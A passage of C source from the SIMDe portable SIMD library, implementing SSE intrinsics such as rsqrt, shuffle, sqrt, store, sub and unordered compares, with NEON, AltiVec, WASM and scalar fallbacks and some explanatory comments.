x = x * (SIMDE_FLOAT32_C(1.5008909) - xhalf * x * x);
#endif
x = x * (SIMDE_FLOAT32_C(1.5008909) - xhalf * x * x);
r_.f32[i] = x;
#endif
}
#elif defined(simde_math_sqrtf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = 1.0f / simde_math_sqrtf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_rsqrt_ps(a) simde_mm_rsqrt_ps((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_rsqrt_ss(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_rsqrt_ss(a);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_rsqrt_ps(a));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vsetq_lane_f32(vgetq_lane_f32(simde_mm_rsqrt_ps(a).neon_f32, 0),
a_.neon_f32, 0);
#elif defined(SIMDE_IEEE754_STORAGE)
{
#if SIMDE_ACCURACY_PREFERENCE <= 0
r_.i32[0] = INT32_C(0x5F37624F) - (a_.i32[0] >> 1);
#else
simde_float32 x = a_.f32[0];
simde_float32 xhalf = SIMDE_FLOAT32_C(0.5) * x;
int32_t ix;
simde_memcpy(&ix, &x, sizeof(ix));
#if SIMDE_ACCURACY_PREFERENCE == 1
ix = INT32_C(0x5F375A82) - (ix >> 1);
#else
ix = INT32_C(0x5F37599E) - (ix >> 1);
#endif
simde_memcpy(&x, &ix, sizeof(x));
#if SIMDE_ACCURACY_PREFERENCE >= 2
x = x * (SIMDE_FLOAT32_C(1.5008909) - xhalf * x * x);
#endif
x = x * (SIMDE_FLOAT32_C(1.5008909) - xhalf * x * x);
r_.f32[0] = x;
#endif
}
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#elif defined(simde_math_sqrtf)
r_.f32[0] = 1.0f / simde_math_sqrtf(a_.f32[0]);
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_rsqrt_ss(a) simde_mm_rsqrt_ss((a))
#endif
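/* Illustrative scalar sketch (hypothetical helper, not part of SIMDe): the
   rsqrt paths above follow the classic fast inverse square root -- seed with
   ix = K - (ix >> 1), then refine with x' = x * (3/2 - (a/2) * x * x). The
   guarded code substitutes the tuned constant 1.5008909 from the cited
   reference for the textbook 3/2. */
static inline simde_float32 simde_example_fast_rsqrt_(simde_float32 a)
{
	simde_float32 x = a;
	simde_float32 ahalf = SIMDE_FLOAT32_C(0.5) * a;
	int32_t ix;
	simde_memcpy(&ix, &x, sizeof(ix));
	ix = INT32_C(0x5F37599E) - (ix >> 1); /* seed estimate of 1/sqrt(a) */
	simde_memcpy(&x, &ix, sizeof(x));
	return x * (SIMDE_FLOAT32_C(1.5008909) - ahalf * x * x); /* one step */
}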
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_sad_pu8(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_sad_pu8(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint16x4_t t = vpaddl_u8(vabd_u8(a_.neon_u8, b_.neon_u8));
uint16_t r0 = t[0] + t[1] + t[2] + t[3];
r_.neon_u16 = vset_lane_u16(r0, vdup_n_u16(0), 0);
#else
uint16_t sum = 0;
#if defined(SIMDE_HAVE_STDLIB_H)
SIMDE_VECTORIZE_REDUCTION(+ : sum)
for (size_t i = 0; i < (sizeof(r_.u8) / sizeof(r_.u8[0])); i++) {
sum += HEDLEY_STATIC_CAST(uint8_t, abs(a_.u8[i] - b_.u8[i]));
}
r_.i16[0] = HEDLEY_STATIC_CAST(int16_t, sum);
r_.i16[1] = 0;
r_.i16[2] = 0;
r_.i16[3] = 0;
#else
HEDLEY_UNREACHABLE();
#endif
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_psadbw(a, b) simde_mm_sad_pu8(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sad_pu8(a, b) simde_mm_sad_pu8(a, b)
#define _m_psadbw(a, b) simde_mm_sad_pu8(a, b)
#endif
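/* Worked example (hypothetical lane values): for a = {1, 5, 0, ..., 0} and
   b = {4, 2, 0, ..., 0}, the sum of absolute byte differences is
   |1 - 4| + |5 - 2| = 6, so the result carries 6 in its low 16-bit lane and
   zeros in the remaining lanes, matching the scalar fallback above. */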
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_set_ss(simde_float32 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_set_ss(a);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return vsetq_lane_f32(a, vdupq_n_f32(SIMDE_FLOAT32_C(0.0)), 0);
#else
return simde_mm_set_ps(SIMDE_FLOAT32_C(0.0), SIMDE_FLOAT32_C(0.0),
SIMDE_FLOAT32_C(0.0), a);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_set_ss(a) simde_mm_set_ss(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_setr_ps(simde_float32 e3, simde_float32 e2,
simde_float32 e1, simde_float32 e0)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_setr_ps(e3, e2, e1, e0);
#else
return simde_mm_set_ps(e0, e1, e2, e3);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_setr_ps(e3, e2, e1, e0) simde_mm_setr_ps(e3, e2, e1, e0)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_setzero_ps(void)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_setzero_ps();
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return vdupq_n_f32(SIMDE_FLOAT32_C(0.0));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
return vec_splats(SIMDE_FLOAT32_C(0.0));
#else
simde__m128 r;
simde_memset(&r, 0, sizeof(r));
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_setzero_ps() simde_mm_setzero_ps()
#endif
#if defined(SIMDE_X86_SSE_NATIVE)
#if defined(__has_builtin)
#if __has_builtin(__builtin_ia32_undef128)
#define SIMDE_HAVE_UNDEFINED128
#endif
#elif !defined(__PGI) && !defined(SIMDE_BUG_GCC_REV_208793) && \
	!defined(_MSC_VER)
#define SIMDE_HAVE_UNDEFINED128
#endif
#endif
#if defined(SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_)
HEDLEY_DIAGNOSTIC_PUSH
SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_undefined_ps(void)
{
simde__m128_private r_;
#if defined(SIMDE_HAVE_UNDEFINED128)
r_.n = _mm_undefined_ps();
#elif !defined(SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_)
r_ = simde__m128_to_private(simde_mm_setzero_ps());
#endif
return simde__m128_from_private(r_);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_undefined_ps() simde_mm_undefined_ps()
#endif
#if defined(SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_)
HEDLEY_DIAGNOSTIC_POP
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_setone_ps(void)
{
simde__m128 t = simde_mm_setzero_ps();
return simde_mm_cmpeq_ps(t, t);
}
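/* Note on the idiom above: every lane of t compares equal to itself
   (0.0f == 0.0f), so the equality mask comes back with all bits set in each
   lane -- a branch-free way to materialize ~0 without an integer splat. */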
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_sfence(void)
{
/* TODO: Use Hedley. */
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_sfence();
#elif defined(__GNUC__) && \
((__GNUC__ > 4) || (__GNUC__ == 4 && __GNUC_MINOR__ >= 7))
__atomic_thread_fence(__ATOMIC_SEQ_CST);
#elif !defined(__INTEL_COMPILER) && defined(__STDC_VERSION__) && \
(__STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_ATOMICS__)
#if defined(__GNUC__) && (__GNUC__ == 4) && (__GNUC_MINOR__ < 9)
__atomic_thread_fence(__ATOMIC_SEQ_CST);
#else
atomic_thread_fence(memory_order_seq_cst);
#endif
#elif defined(_MSC_VER)
MemoryBarrier();
#elif HEDLEY_HAS_EXTENSION(c_atomic)
__c11_atomic_thread_fence(__ATOMIC_SEQ_CST);
#elif defined(__GNUC__) && \
((__GNUC__ > 4) || (__GNUC__ == 4 && __GNUC_MINOR__ >= 1))
__sync_synchronize();
#elif defined(_OPENMP)
#pragma omp critical(simde_mm_sfence_)
{
}
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sfence() simde_mm_sfence()
#endif
#define SIMDE_MM_SHUFFLE(z, y, x, w) \
(((z) << 6) | ((y) << 4) | ((x) << 2) | (w))
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _MM_SHUFFLE(z, y, x, w) SIMDE_MM_SHUFFLE(z, y, x, w)
#endif
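/* Worked example: the macro packs four 2-bit lane selectors, z into bits 7:6
   down to w into bits 1:0, so
   SIMDE_MM_SHUFFLE(3, 2, 1, 0) == (3 << 6) | (2 << 4) | (1 << 2) | 0 == 0xE4,
   the identity selector for the shuffle operations below. */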
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE) && \
!defined(__PGI)
#define simde_mm_shuffle_pi16(a, imm8) _mm_shuffle_pi16(a, imm8)
#elif defined(SIMDE_SHUFFLE_VECTOR_)
#define simde_mm_shuffle_pi16(a, imm8) \
(__extension__({ \
const simde__m64_private simde__tmp_a_ = \
simde__m64_to_private(a); \
simde__m64_from_private((simde__m64_private){ \
.i16 = SIMDE_SHUFFLE_VECTOR_( \
16, 8, (simde__tmp_a_).i16, \
(simde__tmp_a_).i16, (((imm8)) & 3), \
(((imm8) >> 2) & 3), (((imm8) >> 4) & 3), \
(((imm8) >> 6) & 3))}); \
}))
#else
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_shuffle_pi16(simde__m64 a, const int imm8)
SIMDE_REQUIRE_CONSTANT_RANGE(imm8, 0, 255)
{
simde__m64_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
for (size_t i = 0; i < sizeof(r_.i16) / sizeof(r_.i16[0]); i++) {
r_.i16[i] = a_.i16[(imm8 >> (i * 2)) & 3];
}
HEDLEY_DIAGNOSTIC_PUSH
#if HEDLEY_HAS_WARNING("-Wconditional-uninitialized")
#pragma clang diagnostic ignored "-Wconditional-uninitialized"
#endif
return simde__m64_from_private(r_);
HEDLEY_DIAGNOSTIC_POP
}
#endif
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE) && \
!defined(__PGI)
#define simde_m_pshufw(a, imm8) _m_pshufw(a, imm8)
#else
#define simde_m_pshufw(a, imm8) simde_mm_shuffle_pi16(a, imm8)
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_shuffle_pi16(a, imm8) simde_mm_shuffle_pi16(a, imm8)
#define _m_pshufw(a, imm8) simde_mm_shuffle_pi16(a, imm8)
#endif
#if defined(SIMDE_X86_SSE_NATIVE) && !defined(__PGI)
#define simde_mm_shuffle_ps(a, b, imm8) _mm_shuffle_ps(a, b, imm8)
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
#define simde_mm_shuffle_ps(a, b, imm8) \
__extension__({ \
float32x4_t ret; \
ret = vmovq_n_f32(vgetq_lane_f32(a, (imm8) & (0x3))); \
ret = vsetq_lane_f32(vgetq_lane_f32(a, ((imm8) >> 2) & 0x3), \
ret, 1); \
ret = vsetq_lane_f32(vgetq_lane_f32(b, ((imm8) >> 4) & 0x3), \
ret, 2); \
ret = vsetq_lane_f32(vgetq_lane_f32(b, ((imm8) >> 6) & 0x3), \
ret, 3); \
})
#elif defined(SIMDE_SHUFFLE_VECTOR_)
#define simde_mm_shuffle_ps(a, b, imm8) \
(__extension__({ \
simde__m128_from_private((simde__m128_private){ \
.f32 = SIMDE_SHUFFLE_VECTOR_( \
32, 16, simde__m128_to_private(a).f32, \
simde__m128_to_private(b).f32, (((imm8)) & 3), \
(((imm8) >> 2) & 3), (((imm8) >> 4) & 3) + 4, \
(((imm8) >> 6) & 3) + 4)}); \
}))
#else
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_shuffle_ps(simde__m128 a, simde__m128 b, const int imm8)
SIMDE_REQUIRE_CONSTANT_RANGE(imm8, 0, 255)
{
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.f32[0] = a_.f32[(imm8 >> 0) & 3];
r_.f32[1] = a_.f32[(imm8 >> 2) & 3];
r_.f32[2] = b_.f32[(imm8 >> 4) & 3];
r_.f32[3] = b_.f32[(imm8 >> 6) & 3];
return simde__m128_from_private(r_);
}
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_shuffle_ps(a, b, imm8) simde_mm_shuffle_ps((a), (b), imm8)
#endif
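/* Usage sketch (hypothetical values): the two low result lanes always come
   from a and the two high lanes from b, so
   r = simde_mm_shuffle_ps(a, b, SIMDE_MM_SHUFFLE(1, 0, 3, 2))
   yields r = { a[2], a[3], b[0], b[1] }, exactly as the portable fallback
   above spells out lane by lane. */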
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_sqrt_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_sqrt_ps(a);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
r_.neon_f32 = vsqrtq_f32(a_.neon_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x4_t est = vrsqrteq_f32(a_.neon_f32);
for (int i = 0; i <= SIMDE_ACCURACY_PREFERENCE; i++) {
est = vmulq_f32(vrsqrtsq_f32(vmulq_f32(a_.neon_f32, est), est),
est);
}
r_.neon_f32 = vmulq_f32(a_.neon_f32, est);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_sqrt(a_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = vec_sqrt(a_.altivec_f32);
#elif defined(simde_math_sqrtf)
SIMDE_VECTORIZE
for (size_t i = 0; i < sizeof(r_.f32) / sizeof(r_.f32[0]); i++) {
r_.f32[i] = simde_math_sqrtf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sqrt_ps(a) simde_mm_sqrt_ps((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_sqrt_ss(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_sqrt_ss(a);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_sqrt_ps(a));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t value = vgetq_lane_f32(
simde__m128_to_private(simde_mm_sqrt_ps(a)).neon_f32, 0);
r_.neon_f32 = vsetq_lane_f32(value, a_.neon_f32, 0);
#elif defined(simde_math_sqrtf)
r_.f32[0] = simde_math_sqrtf(a_.f32[0]);
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sqrt_ss(a) simde_mm_sqrt_ss((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_store_ps(simde_float32 mem_addr[4], simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_store_ps(mem_addr, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1q_f32(mem_addr, a_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
vec_st(a_.altivec_f32, 0, mem_addr);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
wasm_v128_store(mem_addr, a_.wasm_v128);
#else
simde_memcpy(mem_addr, &a_, sizeof(a));
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_store_ps(mem_addr, a) \
simde_mm_store_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_store1_ps(simde_float32 mem_addr[4], simde__m128 a)
{
simde_float32 *mem_addr_ =
SIMDE_ALIGN_ASSUME_LIKE(mem_addr, simde__m128);
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_store_ps1(mem_addr_, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1q_f32(mem_addr_, vdupq_lane_f32(vget_low_f32(a_.neon_f32), 0));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
wasm_v128_store(mem_addr_,
wasm_v32x4_shuffle(a_.wasm_v128, a_.wasm_v128, 0, 0, 0,
0));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
vec_st(vec_splat(a_.altivec_f32, 0), 0, mem_addr_);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
simde__m128_private tmp_;
tmp_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, a_.f32, 0, 0, 0, 0);
	simde_mm_store_ps(mem_addr_, simde__m128_from_private(tmp_));
#else
SIMDE_VECTORIZE_ALIGNED(mem_addr_ : 16)
for (size_t i = 0; i < sizeof(a_.f32) / sizeof(a_.f32[0]); i++) {
mem_addr_[i] = a_.f32[0];
}
#endif
#endif
}
#define simde_mm_store_ps1(mem_addr, a) simde_mm_store1_ps(mem_addr, a)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_store_ps1(mem_addr, a) \
simde_mm_store1_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#define _mm_store1_ps(mem_addr, a) \
simde_mm_store1_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_store_ss(simde_float32 *mem_addr, simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_store_ss(mem_addr, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1q_lane_f32(mem_addr, a_.neon_f32, 0);
#else
*mem_addr = a_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_store_ss(mem_addr, a) \
simde_mm_store_ss(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_storeh_pi(simde__m64 *mem_addr, simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_storeh_pi(HEDLEY_REINTERPRET_CAST(__m64 *, mem_addr), a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1_f32(HEDLEY_REINTERPRET_CAST(float32_t *, mem_addr),
vget_high_f32(a_.neon_f32));
#else
simde_memcpy(mem_addr, &(a_.m64[1]), sizeof(a_.m64[1]));
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_storeh_pi(mem_addr, a) simde_mm_storeh_pi(mem_addr, (a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_storel_pi(simde__m64 *mem_addr, simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_storel_pi(HEDLEY_REINTERPRET_CAST(__m64 *, mem_addr), a);
#else
simde__m64_private *dest_ =
HEDLEY_REINTERPRET_CAST(simde__m64_private *, mem_addr);
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
dest_->neon_f32 = vget_low_f32(a_.neon_f32);
#else
dest_->f32[0] = a_.f32[0];
dest_->f32[1] = a_.f32[1];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_storel_pi(mem_addr, a) simde_mm_storel_pi(mem_addr, (a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_storer_ps(simde_float32 mem_addr[4], simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_storer_ps(mem_addr, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
vec_st(vec_reve(a_.altivec_f32), 0, mem_addr);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x4_t tmp = vrev64q_f32(a_.neon_f32);
vst1q_f32(mem_addr, vextq_f32(tmp, tmp, 2));
#elif defined(SIMDE_SHUFFLE_VECTOR_)
a_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, a_.f32, 3, 2, 1, 0);
simde_mm_store_ps(mem_addr, simde__m128_from_private(a_));
#else
SIMDE_VECTORIZE_ALIGNED(mem_addr : 16)
for (size_t i = 0; i < sizeof(a_.f32) / sizeof(a_.f32[0]); i++) {
mem_addr[i] =
a_.f32[((sizeof(a_.f32) / sizeof(a_.f32[0])) - 1) - i];
}
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_storer_ps(mem_addr, a) \
simde_mm_storer_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_storeu_ps(simde_float32 mem_addr[4], simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_storeu_ps(mem_addr, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1q_f32(mem_addr, a_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
vec_vsx_st(a_.altivec_f32, 0, mem_addr);
#else
simde_memcpy(mem_addr, &a_, sizeof(a_));
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_storeu_ps(mem_addr, a) \
simde_mm_storeu_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_sub_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_sub_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vsubq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_sub(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_sub(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.f32 = a_.f32 - b_.f32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i] - b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sub_ps(a, b) simde_mm_sub_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_sub_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_sub_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_sub_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.f32[0] = a_.f32[0] - b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sub_ss(a, b) simde_mm_sub_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomieq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomieq_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_eq_b = vceqq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_eq_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] == b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] == b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomieq_ss(a, b) simde_mm_ucomieq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomige_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomige_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_ge_b = vcgeq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_ge_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] >= b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] >= b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomige_ss(a, b) simde_mm_ucomige_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomigt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomigt_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_gt_b = vcgtq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_gt_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] > b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] > b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomigt_ss(a, b) simde_mm_ucomigt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomile_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomile_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
